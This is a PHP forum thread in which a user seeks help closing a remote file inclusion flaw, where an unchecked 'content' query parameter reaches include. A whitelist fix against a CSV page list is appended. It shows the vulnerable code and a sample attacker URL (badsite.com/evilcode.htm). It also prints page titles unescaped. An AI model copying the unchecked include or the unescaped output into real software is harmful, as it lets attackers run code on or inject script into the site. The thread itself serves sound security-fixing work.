Need your HELP on unchecked variable

ee01es
Forum Newbie
Posts: 4
Joined: Sun Jun 25, 2006 6:18 pm
Location: Bonn, Germany

Need your HELP on unchecked variable

Post by ee01es »

feyd | Please use code tags and [syntax="..."] tags where appropriate when posting code. Your post has been edited to reflect how we'd like it posted. Please read: Posting Code in the Forums (http://forums.devnetwork.net/viewtopic.php?t=21171) to learn how to do it too.


Hello,

Please help me!

```php
<?php
if (count($HTTP_GET_VARS) == 0) {
    $content   = 'welcome.php';
    $pageTitle = 'Welcome';
} else {
    // THIS IS LINE 8: $content is taken straight from the query string, unchecked
    $content   = $HTTP_GET_VARS['content'] . ".php";
    $pageTitle = $HTTP_GET_VARS['pagetitle'];
}
include "library/structure.php";
?>
```
The problem is that, current line 8 is to be replaced by some code that only allows $content to be set to one of a known list of pages. I have tried with elseif but no luck.

```php
<?php
// This attempt branches on how many GET parameters were sent,
// not on which page was requested, so it never looks at the value of 'content'.
if (count($HTTP_GET_VARS) == 0) {
    //print "<meta http-equiv='refresh' content='0; URL=index.php?content=welcome&pagetitle=Welcome'>";
    $content   = 'welcome.php';
    $pageTitle = 'Welcome';
} elseif (count($HTTP_GET_VARS) == 1) {
    $content   = 'committee.php';
    $pageTitle = 'Committee Members';
} elseif (count($HTTP_GET_VARS) == 2) {
    $content   = 'events.php';
    $pageTitle = 'Meetings and Events';
} elseif (count($HTTP_GET_VARS) == 3) {
    $content   = 'farewell.php';
    $pageTitle = '2004 Farewell Message';
} elseif (count($HTTP_GET_VARS) == 4) {
    $content   = 'pastevents.php';
    $pageTitle = 'Past Events';
} else {
    $content   = 'links.php';
    $pageTitle = 'Links';
}

include "library/structure.php";
?>
```
Many thanks.


tecktalkcm0391
DevNet Resident
Posts: 1030
Joined: Fri May 26, 2006 9:25 am
Location: Florida

Post by tecktalkcm0391 »

1.) Use the PHP button or tags for php ( [PHP*] without the *)
2.) Tell us what you need help with in depth
feyd
Neighborhood Spidermoddy
Posts: 31559
Joined: Mon Mar 29, 2004 3:24 pm
Location: Bothell, Washington, USA

Post by feyd »

You may want to look at using a switch().
ee01es
Forum Newbie
Posts: 4
Joined: Sun Jun 25, 2006 6:18 pm
Location: Bonn, Germany

Need your HELP on unchecked variable

Post by ee01es »

Hi Feyd,

Thank you for your advice and the hint on using "switch", but it does not seem to be working correctly for me!

BR, Eha
Luke
The Ninja Space Mod
Posts: 6424
Joined: Fri Aug 05, 2005 1:53 pm
Location: Paradise, CA

Post by Luke »

Post your code of it "not working correctly" so we can see what's wrong.
ee01es
Forum Newbie
Posts: 4
Joined: Sun Jun 25, 2006 6:18 pm
Location: Bonn, Germany

Post by ee01es »

Thank you very much for your quick reply.

```php
<?php
// Build the menu from menu.csv: column 0 is the page title, column 1 is the
// page name used in the 'content' query parameter.
$fp = fopen("menu.csv", "r");
while (($data = fgetcsv($fp, 1000, ",")) !== false) {
    if (isset($HTTP_GET_VARS['content']) && $HTTP_GET_VARS['content'] == $data[1]) {
        print "<span class=menucurrent>" . $data[0] . "</span><br>\n";
    } else {
        print "<a class=menu href=\"index.php?content=" . $data[1] . "&pagetitle=" . $data[0] . "\">" . $data[0] . "</a><br>\n";
    }
}
fclose($fp);
?>


<a class=menu href="http://www.iee.org.uk" target="_blank">IEE </a><br>

</font>
</td>

<td class=bodytext valign=top>
<!--Contents of the page inserted below here from file given in the php variable $content-->



<center>
<h1><?php print $siteTitle ?></h1>
<h2><?php print $pageTitle ?></h2>
</center>



<?php include $content; ?>     <!-- *** THIS IS NOT CHECKED *** -->
<p class=note>


<?php $update_date = date("jS F Y", filemtime($content)); ?>
Last Updated: <?php print $update_date; ?>  Webdevelopment: <a href="mailto:<?php print $webdev_email; ?>"><?php print $webdev_name; ?></a>
```


***The script above accepts a variable 'content' which is not checked before being passed into a PHP 'include' command. As a result, an attacker can pass content=http://www.badsite.com/evilcode.htm to your site and the server will include this code in your site.

So, I need to introduce checking into my script to ensure that it is not possible to pass unchecked variables into the script, and to ensure that these are not then used within an 'include' or 'require' statement.

The problem is that, current line 8 in the previous source is to be replaced by some code that only allows $content to be set to one of a known list of pages. I have tried with elseif but no luck. I have got the list of pages in menu.csv and therefore I could do something like loop through menu.csv until the page name equals $HTTP_GET_VARS['content'] and then set $content to be that, else set $content to the default welcome page. What do you think? Any ideas on how to do it?

Many thanks for your support.
Cheers, Eha
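One way to do the lookup the last paragraph describes, as an added example that is not part of the thread: it reads menu.csv into a list of known pages (assuming rows of the form title,page-name, as the menu code above reads them) and only sets $content when the request matches a known page name exactly, falling back to the welcome page otherwise. It uses $_GET, the successor of $HTTP_GET_VARS; the function names are the example's own.

```php
<?php
// Added example, not from the thread. Assumes menu.csv rows look like
//   "Committee Members,committee"   (column 0 = title, column 1 = page name)

function load_menu($csvFile)
{
    // Returns page name => title for every row in the CSV.
    $pages = array();
    $fp = fopen($csvFile, 'r');
    if ($fp === false) {
        return $pages;              // no menu file: only the default page is known
    }
    while (($row = fgetcsv($fp, 1000, ',')) !== false) {
        if (count($row) >= 2) {
            $pages[$row[1]] = $row[0];
        }
    }
    fclose($fp);
    return $pages;
}

function resolve_page($pages, $requested)
{
    // Accept only an exact key match against the known list. A path, a URL,
    // an array or a missing parameter never reaches include: it gets the default.
    if (is_string($requested) && isset($pages[$requested])) {
        $name  = $requested;
        $title = $pages[$requested];
    } else {
        $name  = 'welcome';
        $title = 'Welcome';
    }
    return array('content' => $name . '.php', 'pageTitle' => $title);
}

$pages     = load_menu('menu.csv');
$requested = isset($_GET['content']) ? $_GET['content'] : '';
$page      = resolve_page($pages, $requested);

$content   = $page['content'];
$pageTitle = $page['pageTitle'];   // title comes from the CSV, not from the URL
include "library/structure.php";
?>
```

Because the title is also looked up from menu.csv, the pagetitle query parameter is no longer needed at all.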
ee01es
Forum Newbie
Posts: 4
Joined: Sun Jun 25, 2006 6:18 pm
Location: Bonn, Germany

Need your HELP on unchecked variable

Post by ee01es »

Hi Chris, Thanks for the reply.

Please find the requested info!

Cheers, Eha